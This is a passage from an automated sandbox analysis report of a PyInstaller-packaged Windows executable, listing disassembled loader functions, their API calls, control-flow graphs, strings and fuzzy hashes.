                                                                                                                        • Instruction Fuzzy Hash: 28C1E13AB28A4286EB10EF68C4906AC7B61FB49FA8B851335DE1E577D5CF3AD451C310
                                                                                                                        Function 00007FF7C5BD6780 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(?,00000000,?,00007FF7C5BD674D), ref: 00007FF7C5BD681A
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: GetEnvironmentVariableW.KERNEL32(00007FF7C5BD36E7), ref: 00007FF7C5BD69CA
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C5BD69E7
                                                                                                                          • Part of subcall function 00007FF7C5BE66B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BE66CD
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7C5BD68D1
                                                                                                                          • Part of subcall function 00007FF7C5BD2770: MessageBoxW.USER32 ref: 00007FF7C5BD2841
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                        • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                        • API String ID: 3752271684-1116378104
                                                                                                                        • Opcode ID: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                                                                                        • Instruction ID: cda41878d6fcf474c9fde77384bd5808f9ed1bfaaf7d0375ed16a91f2ba6905e
                                                                                                                        • Opcode Fuzzy Hash: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                                                                                        • Instruction Fuzzy Hash: 39517A11F1D65340FA55BF62A9152BADA419F99FE0FC84031ED0E4B79BED2FE4018360
                                                                                                                        Function 00007FF7C5BF509C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 773 7ff7c5bf509c-7ff7c5bf50d1 call 7ff7c5bf47a8 call 7ff7c5bf47b0 call 7ff7c5bf4818 780 7ff7c5bf520f-7ff7c5bf527d call 7ff7c5be9dd0 call 7ff7c5bf06b8 773->780 781 7ff7c5bf50d7-7ff7c5bf50e2 call 7ff7c5bf47b8 773->781 793 7ff7c5bf527f-7ff7c5bf5286 780->793 794 7ff7c5bf528b-7ff7c5bf528e 780->794 781->780 787 7ff7c5bf50e8-7ff7c5bf50f3 call 7ff7c5bf47e8 781->787 787->780 792 7ff7c5bf50f9-7ff7c5bf511c call 7ff7c5be9e18 GetTimeZoneInformation 787->792 804 7ff7c5bf51e4-7ff7c5bf520e call 7ff7c5bf47a0 call 7ff7c5bf4790 call 7ff7c5bf4798 792->804 805 7ff7c5bf5122-7ff7c5bf5143 792->805 796 7ff7c5bf531b-7ff7c5bf531e 793->796 797 7ff7c5bf52c5-7ff7c5bf52d8 call 7ff7c5becacc 794->797 798 7ff7c5bf5290 794->798 801 7ff7c5bf5293 796->801 802 7ff7c5bf5324-7ff7c5bf532c call 7ff7c5bf4e20 796->802 809 7ff7c5bf52e3-7ff7c5bf52fe call 7ff7c5bf06b8 797->809 810 7ff7c5bf52da 797->810 798->801 806 7ff7c5bf5298-7ff7c5bf52c4 call 7ff7c5be9e18 call 7ff7c5bdad80 801->806 807 7ff7c5bf5293 call 7ff7c5bf509c 801->807 802->806 811 7ff7c5bf5145-7ff7c5bf514b 805->811 812 7ff7c5bf514e-7ff7c5bf5155 805->812 807->806 829 7ff7c5bf5305-7ff7c5bf5317 call 7ff7c5be9e18 809->829 830 7ff7c5bf5300-7ff7c5bf5303 809->830 816 7ff7c5bf52dc-7ff7c5bf52e1 call 7ff7c5be9e18 810->816 811->812 818 7ff7c5bf5169 812->818 819 7ff7c5bf5157-7ff7c5bf515f 812->819 816->798 826 7ff7c5bf516b-7ff7c5bf51df call 7ff7c5bdc210 * 4 call 7ff7c5bf1c7c call 7ff7c5bf5334 * 2 818->826 819->818 824 7ff7c5bf5161-7ff7c5bf5167 819->824 824->826 826->804 829->796 830->816
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50CA
                                                                                                                          • Part of subcall function 00007FF7C5BF4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50DB
                                                                                                                          • Part of subcall function 00007FF7C5BF47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47CC
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50EC
                                                                                                                          • Part of subcall function 00007FF7C5BF47E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47FC
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C5BF532C), ref: 00007FF7C5BF5113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                        • Opcode ID: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction ID: b542a646c70d33fb2b8e465bd2ae26e3563430b23292352d7544d407c985affd
                                                                                                                        • Opcode Fuzzy Hash: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction Fuzzy Hash: 1B518336A1864286E720FF25E9811AAFB60FB48FA4FC45235DB0D47696DF3EE4018760
                                                                                                                        Function 00007FF7C5BD17B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                        • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                        • API String ID: 2153230061-4158440160
                                                                                                                        • Opcode ID: 714ddc56d6c35ad9c7aa775d0425867703327e3be7a47343cab82f4bdc7a77c5
                                                                                                                        • Instruction ID: f344511dbbf7dbd882909bfd4dac6594aebba806be02e8c3032f205a4c819182
                                                                                                                        • Opcode Fuzzy Hash: 714ddc56d6c35ad9c7aa775d0425867703327e3be7a47343cab82f4bdc7a77c5
                                                                                                                        • Instruction Fuzzy Hash: 0751A672A09A0286EB54EF28D49017CBBA0FF48F68B918135DA0D8339DDF7EE541C760
                                                                                                                        Function 00007FF7C5BD1440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 53 7ff7c5bd1440-7ff7c5bd1457 call 7ff7c5bd6720 56 7ff7c5bd1462-7ff7c5bd1485 call 7ff7c5bd6a40 53->56 57 7ff7c5bd1459-7ff7c5bd1461 53->57 60 7ff7c5bd14a7-7ff7c5bd14ad 56->60 61 7ff7c5bd1487-7ff7c5bd14a2 call 7ff7c5bd24d0 56->61 63 7ff7c5bd14af-7ff7c5bd14ba call 7ff7c5bd3cb0 60->63 64 7ff7c5bd14e0-7ff7c5bd14f4 call 7ff7c5bdf934 60->64 69 7ff7c5bd1635-7ff7c5bd1647 61->69 70 7ff7c5bd14bf-7ff7c5bd14c5 63->70 71 7ff7c5bd1516-7ff7c5bd151a 64->71 72 7ff7c5bd14f6-7ff7c5bd1511 call 7ff7c5bd24d0 64->72 70->64 73 7ff7c5bd14c7-7ff7c5bd14db call 7ff7c5bd2770 70->73 75 7ff7c5bd1534-7ff7c5bd1554 call 7ff7c5be40b0 71->75 76 7ff7c5bd151c-7ff7c5bd1528 call 7ff7c5bd1050 71->76 82 7ff7c5bd1617-7ff7c5bd161d 72->82 73->82 87 7ff7c5bd1575-7ff7c5bd157b 75->87 88 7ff7c5bd1556-7ff7c5bd1570 call 7ff7c5bd24d0 75->88 83 7ff7c5bd152d-7ff7c5bd152f 76->83 85 7ff7c5bd161f call 7ff7c5bdf2ac 82->85 86 7ff7c5bd162b-7ff7c5bd162e call 7ff7c5bdf2ac 82->86 83->82 96 7ff7c5bd1624 85->96 97 7ff7c5bd1633 86->97 89 7ff7c5bd1605-7ff7c5bd1608 call 7ff7c5be409c 87->89 90 7ff7c5bd1581-7ff7c5bd1586 87->90 99 7ff7c5bd160d-7ff7c5bd1612 88->99 89->99 95 7ff7c5bd1590-7ff7c5bd15b2 call 7ff7c5bdf5fc 90->95 102 7ff7c5bd15b4-7ff7c5bd15cc call 7ff7c5bdfd3c 95->102 103 7ff7c5bd15e5-7ff7c5bd15ec 95->103 96->86 97->69 99->82 108 7ff7c5bd15d5-7ff7c5bd15e3 102->108 109 7ff7c5bd15ce-7ff7c5bd15d1 102->109 105 7ff7c5bd15f3-7ff7c5bd15fb call 7ff7c5bd24d0 103->105 112 7ff7c5bd1600 105->112 108->105 109->95 111 7ff7c5bd15d3 109->111 111->112 112->89
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                        • API String ID: 0-666925554
                                                                                                                        • Opcode ID: 9f40073d6daf23d4a863679b16c10efd26f5be1a952eb147f080346661d27035
                                                                                                                        • Instruction ID: 4a4fb81d5e1602a50231041fedd0c9ce985bcdb6b77d1cdb214a7921caec134b
                                                                                                                        • Opcode Fuzzy Hash: 9f40073d6daf23d4a863679b16c10efd26f5be1a952eb147f080346661d27035
                                                                                                                        • Instruction Fuzzy Hash: 42519965B08A4281EA24BF15E4006B9EBA0AF45FF8F844131DE0D4779AEE7EE545C720
                                                                                                                        Function 00007FF7C5BD78A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                        • API String ID: 4998090-2855260032
                                                                                                                        • Opcode ID: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                                                                                        • Instruction ID: 4592ac833942ec2100ccf0e8d39448d9647ebfafc05b7f3cf69183974697539d
                                                                                                                        • Opcode Fuzzy Hash: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                                                                                        • Instruction Fuzzy Hash: FB415F3261C68282EA50AF64E4447AAFB61FB84BB4FC40231EA5E476D9DF3DE548C710
                                                                                                                        Function 00007FF7C5BD6FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                        • String ID: CreateProcessW$Error creating child process!
                                                                                                                        • API String ID: 2895956056-3524285272
                                                                                                                        • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                        • Instruction ID: 46c5d364aa541ed5aaf5d63e9626c6c4f578efcae7a2b80e6798c5a16daecc32
                                                                                                                        • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                        • Instruction Fuzzy Hash: 91415632A08B8281DA20AF64F4452AAF760FF95774F900335E6AD47BD9DF7DD0448B50
                                                                                                                        Function 00007FF7C5BD1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 383 7ff7c5bd1000-7ff7c5bd3686 call 7ff7c5bdf080 call 7ff7c5bdf078 call 7ff7c5bd7600 call 7ff7c5bdf078 call 7ff7c5bdadb0 call 7ff7c5be4270 call 7ff7c5be4f14 call 7ff7c5bd1af0 401 7ff7c5bd368c-7ff7c5bd369b call 7ff7c5bd3ba0 383->401 402 7ff7c5bd379a 383->402 401->402 407 7ff7c5bd36a1-7ff7c5bd36b4 call 7ff7c5bd3a70 401->407 404 7ff7c5bd379f-7ff7c5bd37bf call 7ff7c5bdad80 402->404 407->402 411 7ff7c5bd36ba-7ff7c5bd36cd call 7ff7c5bd3b20 407->411 411->402 414 7ff7c5bd36d3-7ff7c5bd36fa call 7ff7c5bd6990 411->414 417 7ff7c5bd373c-7ff7c5bd3764 call 7ff7c5bd6f90 call 7ff7c5bd19d0 414->417 418 7ff7c5bd36fc-7ff7c5bd370b call 7ff7c5bd6990 414->418 429 7ff7c5bd384d-7ff7c5bd385e 417->429 430 7ff7c5bd376a-7ff7c5bd3780 call 7ff7c5bd19d0 417->430 418->417 423 7ff7c5bd370d-7ff7c5bd3713 418->423 425 7ff7c5bd3715-7ff7c5bd371d 423->425 426 7ff7c5bd371f-7ff7c5bd3739 call 7ff7c5be409c call 7ff7c5bd6f90 423->426 425->426 426->417 432 7ff7c5bd3873-7ff7c5bd388b call 7ff7c5bd7a30 429->432 433 7ff7c5bd3860-7ff7c5bd386a call 7ff7c5bd3280 429->433 439 7ff7c5bd37c0-7ff7c5bd37c3 430->439 440 7ff7c5bd3782-7ff7c5bd3795 call 7ff7c5bd2770 430->440 448 7ff7c5bd388d-7ff7c5bd3899 call 7ff7c5bd2770 432->448 449 7ff7c5bd389e-7ff7c5bd38a5 SetDllDirectoryW 432->449 446 7ff7c5bd38ab-7ff7c5bd38b8 call 7ff7c5bd5e40 433->446 447 7ff7c5bd386c 433->447 439->429 445 7ff7c5bd37c9-7ff7c5bd37e0 call 7ff7c5bd3cb0 439->445 440->402 458 7ff7c5bd37e2-7ff7c5bd37e5 445->458 459 7ff7c5bd37e7-7ff7c5bd3813 call 7ff7c5bd7200 445->459 456 7ff7c5bd3906-7ff7c5bd390b call 7ff7c5bd5dc0 446->456 457 7ff7c5bd38ba-7ff7c5bd38ca call 7ff7c5bd5ae0 446->457 447->432 448->402 449->446 465 7ff7c5bd3910-7ff7c5bd3913 456->465 457->456 471 7ff7c5bd38cc-7ff7c5bd38db call 7ff7c5bd5640 457->471 462 7ff7c5bd3822-7ff7c5bd3838 call 7ff7c5bd2770 458->462 472 7ff7c5bd3815-7ff7c5bd381d call 7ff7c5bdf2ac 459->472 473 7ff7c5bd383d-7ff7c5bd384b 459->473 462->402 469 7ff7c5bd39c6-7ff7c5bd39d5 call 7ff7c5bd3110 465->469 470 7ff7c5bd3919-7ff7c5bd3926 465->470 469->402 487 7ff7c5bd39db-7ff7c5bd3a12 call 7ff7c5bd6f20 call 7ff7c5bd6990 call 7ff7c5bd53e0 469->487 475 7ff7c5bd3930-7ff7c5bd393a 470->475 485 7ff7c5bd38fc-7ff7c5bd3901 call 7ff7c5bd5890 471->485 486 7ff7c5bd38dd-7ff7c5bd38e9 call 7ff7c5bd55d0 471->486 472->462 473->433 479 7ff7c5bd3943-7ff7c5bd3945 475->479 480 7ff7c5bd393c-7ff7c5bd3941 475->480 483 7ff7c5bd3991-7ff7c5bd39c1 call 7ff7c5bd3270 call 7ff7c5bd30b0 call 7ff7c5bd3260 call 7ff7c5bd5890 call 7ff7c5bd5dc0 479->483 484 7ff7c5bd3947-7ff7c5bd396a call 7ff7c5bd1b30 479->484 480->475 480->479 483->404 484->402 499 7ff7c5bd3970-7ff7c5bd397b 484->499 485->456 486->485 500 7ff7c5bd38eb-7ff7c5bd38fa call 7ff7c5bd5c90 486->500 487->402 510 7ff7c5bd3a18-7ff7c5bd3a2b call 7ff7c5bd3270 call 7ff7c5bd6fd0 487->510 503 7ff7c5bd3980-7ff7c5bd398f 499->503 500->465 503->483 503->503 518 7ff7c5bd3a30-7ff7c5bd3a4d call 7ff7c5bd5890 call 7ff7c5bd5dc0 510->518 523 7ff7c5bd3a4f-7ff7c5bd3a52 call 7ff7c5bd6c90 518->523 524 7ff7c5bd3a57-7ff7c5bd3a61 call 7ff7c5bd1ab0 518->524 523->524 524->404
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7C5BD3BA0: GetModuleFileNameW.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD3BD1
                                                                                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF7C5BD38A5
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: GetEnvironmentVariableW.KERNEL32(00007FF7C5BD36E7), ref: 00007FF7C5BD69CA
                                                                                                                          • Part of subcall function 00007FF7C5BD6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C5BD69E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                        • API String ID: 2344891160-3602715111
                                                                                                                        • Opcode ID: 104acf457c9727ee71317e1ea522d3c3f94fcac2246deb33245bf18bb8df501a
                                                                                                                        • Instruction ID: 1629f25c298cfab962bd4660e0508d1c8994d1c08ae450e33b6bc112ca472f20
                                                                                                                        • Opcode Fuzzy Hash: 104acf457c9727ee71317e1ea522d3c3f94fcac2246deb33245bf18bb8df501a
                                                                                                                        • Instruction Fuzzy Hash: 81B19326A1CA8341EA64BF2195512FDEB50FF44FA4FC44131EA4D4769FEE2EE505C720
                                                                                                                        Function 00007FF7C5BD1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 528 7ff7c5bd1050-7ff7c5bd10ab call 7ff7c5bda610 531 7ff7c5bd10d3-7ff7c5bd10eb call 7ff7c5be40b0 528->531 532 7ff7c5bd10ad-7ff7c5bd10d2 call 7ff7c5bd2770 528->532 537 7ff7c5bd10ed-7ff7c5bd1104 call 7ff7c5bd24d0 531->537 538 7ff7c5bd1109-7ff7c5bd1119 call 7ff7c5be40b0 531->538 545 7ff7c5bd126c-7ff7c5bd1281 call 7ff7c5bda2f0 call 7ff7c5be409c * 2 537->545 543 7ff7c5bd111b-7ff7c5bd1132 call 7ff7c5bd24d0 538->543 544 7ff7c5bd1137-7ff7c5bd1147 538->544 543->545 547 7ff7c5bd1150-7ff7c5bd1175 call 7ff7c5bdf5fc 544->547 561 7ff7c5bd1286-7ff7c5bd12a0 545->561 554 7ff7c5bd117b-7ff7c5bd1185 call 7ff7c5bdf370 547->554 555 7ff7c5bd125e 547->555 554->555 562 7ff7c5bd118b-7ff7c5bd1197 554->562 557 7ff7c5bd1264 555->557 557->545 563 7ff7c5bd11a0-7ff7c5bd11c8 call 7ff7c5bd8a60 562->563 566 7ff7c5bd1241-7ff7c5bd125c call 7ff7c5bd2770 563->566 567 7ff7c5bd11ca-7ff7c5bd11cd 563->567 566->557 568 7ff7c5bd11cf-7ff7c5bd11d9 567->568 569 7ff7c5bd123c 567->569 571 7ff7c5bd1203-7ff7c5bd1206 568->571 572 7ff7c5bd11db-7ff7c5bd11e8 call 7ff7c5bdfd3c 568->572 569->566 575 7ff7c5bd1208-7ff7c5bd1216 call 7ff7c5bdbb60 571->575 576 7ff7c5bd1219-7ff7c5bd121e 571->576 577 7ff7c5bd11ed-7ff7c5bd11f0 572->577 575->576 576->563 579 7ff7c5bd1220-7ff7c5bd1223 576->579 580 7ff7c5bd11f2-7ff7c5bd11fc call 7ff7c5bdf370 577->580 581 7ff7c5bd11fe-7ff7c5bd1201 577->581 583 7ff7c5bd1225-7ff7c5bd1228 579->583 584 7ff7c5bd1237-7ff7c5bd123a 579->584 580->576 580->581 581->566 583->566 586 7ff7c5bd122a-7ff7c5bd1232 583->586 584->557 586->547
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
